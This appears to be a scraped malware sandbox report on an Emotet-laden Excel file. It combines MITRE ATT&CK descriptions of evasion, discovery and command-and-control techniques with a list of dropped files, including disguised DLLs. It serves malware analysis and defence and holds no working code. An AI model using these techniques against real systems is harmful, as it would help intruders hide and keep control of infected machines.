Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO0000001552.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview.ttf

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E9097BEB-F41B-41FA-A529-2854DCDBD67E

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\9aad439831564ef9f88438a70a63c87e26ef3852.tbres

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO0000001552.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\elv2.ooocccxxx

C:\Users\user\elv3.ooocccxxx

C:\Windows\System32\GanZhs\FrugrCuQjdEr.dll (copy)

Windows Analysis Report
PO0000001552.xls

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre